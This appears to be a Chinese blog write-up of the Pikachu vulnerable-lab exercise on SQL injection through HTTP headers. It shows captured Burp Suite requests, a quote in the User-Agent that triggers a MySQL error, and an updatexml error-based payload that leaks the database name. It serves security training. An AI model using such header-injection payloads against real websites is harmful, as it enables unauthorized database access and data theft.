首页 > 数据库 >pikachu sql inject header 注入

pikachu sql inject header 注入

时间:2022-10-29 17:34:10浏览次数:35  
标签:xml application zh sqli pikachu header inject image

使用admin登录

显示以下内容


朋友,你好,你的信息已经被记录了:点击退出

你的ip地址:172.17.0.1

你的user agent:Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0

你的http accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8

你的端口(本次连接):tcp52654

burpsuite 抓包,请求报文为

GET /vul/sqli/sqli_header/sqli_header.php HTTP/1.1
Host: 192.168.1.9:8080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.9:8080/vul/sqli/sqli_header/sqli_header_login.php
Connection: close
Cookie: ant[uname]=admin; ant[pw]=10470c3b4b1fed12c3baac014be15fac67c6e815; security=high; PHPSESSID=fftr9buiig10nl6bda5f22li59
Upgrade-Insecure-Requests: 1


推测user-agentaccept 为注入点,将请求发给repeater

user-agentaccept 加入一个', 点击send

果然报错:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '52672')' at line 1

说明这里存在注入点

user-agent 改为

1' or updatexml(1,concat(0x7e,database()),0) or '

请求报文变为:

GET /vul/sqli/sqli_header/sqli_header.php HTTP/1.1
Host: 192.168.1.9:8080
User-Agent: 1' or updatexml(1,concat(0x7e,database()),0) or '
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.9:8080/vul/sqli/sqli_header/sqli_header_login.php
Connection: close
Cookie: ant[uname]=admin; ant[pw]=10470c3b4b1fed12c3baac014be15fac67c6e815; security=high; PHPSESSID=fftr9buiig10nl6bda5f22li59
Upgrade-Insecure-Requests: 1


爆出库名

XPATH syntax error: '~pikachu'

标签:xml,application,zh,sqli,pikachu,header,inject,image
From: https://www.cnblogs.com/gradyblog/p/16839197.html

相关文章

  • pikachu SQL-inject insert注入
    insert注入注册页面,用户处输入1'发现报错信息YouhaveanerrorinyourSQLsyntax;checkthemanualthatcorrespondstoyourMySQLserverversionfortherig......
  • 【Vue3】provide和inject 依赖与注入
    provide与inject依赖注入vue3中使用setup语法糖与vue2的provide与inject的区别还是挺大的,这里不讨论vue3的配置项写法。vue2的可以参考学习之前的vue2的provide与inject......
  • weka遇到java.util.zip.ZipException: invalid LOC header (bad signature)
    这是因为有jar包没有下载完全引起的,需要将相应包重新下载。到maven的reposity目录下搜aether*****in-progress(可以搜aether或者in-progress都行)文件,如果存在,把这个文件对......
  • 解决response.setHeader设置下载文件名无效的问题
    response.setHeader设置下载文件名无效response.setContentType("application/octet-stream");response.setHeader("Content-Disposition","attachment;filename=down.......
  • nginx配置增加代替头部proxy_set_header信息upgrade支持WebSocket--笔记
    1、开发的数据库分片管理平台使用nginx代理报错页面访问执行没有报错,chrome按F12有如下报错WebSocketconnectionto'ws://mdb.xxx.cn/app/shard_createtable/'failed: ......
  • AngularJS之Dependency Injection
    AngularJS之DependencyInjection(五) 前言这一节我们来讲讲AngularJS中的依赖注入,在实际开发中Angular提供了具体的方法供我们去调用,但是一旦业务不能满足要求或者出......
  • iOS UITableView sectionHeaderTopPadding
    0x00sectionHeaderTopPaddingiOS15​​UITableView​​​新增属性​​sectionHeaderTopPadding​​Paddingaboveeachsectionheader.Thedefaultvalueis`UITabl......
  • (BADI)Copy PR header text to PO header when ME21N
    货铺QQ群号:834508274进群统一修改群名片,例如BJ_ABAP_森林木。群内禁止发广告及其他一切无关链接,小程序等,进群看公告,谢谢配合不修改昵称会被不定期踢除,谢谢配合下面开始干货:......
  • (EXIT)Copy PR header text to PO header when ME21N
    货铺QQ群号:834508274进群统一修改群名片,例如BJ_ABAP_森林木。群内禁止发广告及其他一切无关链接,小程序等,进群看公告,谢谢配合不修改昵称会被不定期踢除,谢谢配合下面开始干货:......
  • ALV demo 03:cl_salv_table :Add Header (Top of page)
    以下是纯顾问群~QQ群 :SAP干货铺,  群号:775662808所有群管理严格,严格禁止一切外来链接、招聘、广告等垃圾信息!直接上干货了。效果图:code:*&------------------------------......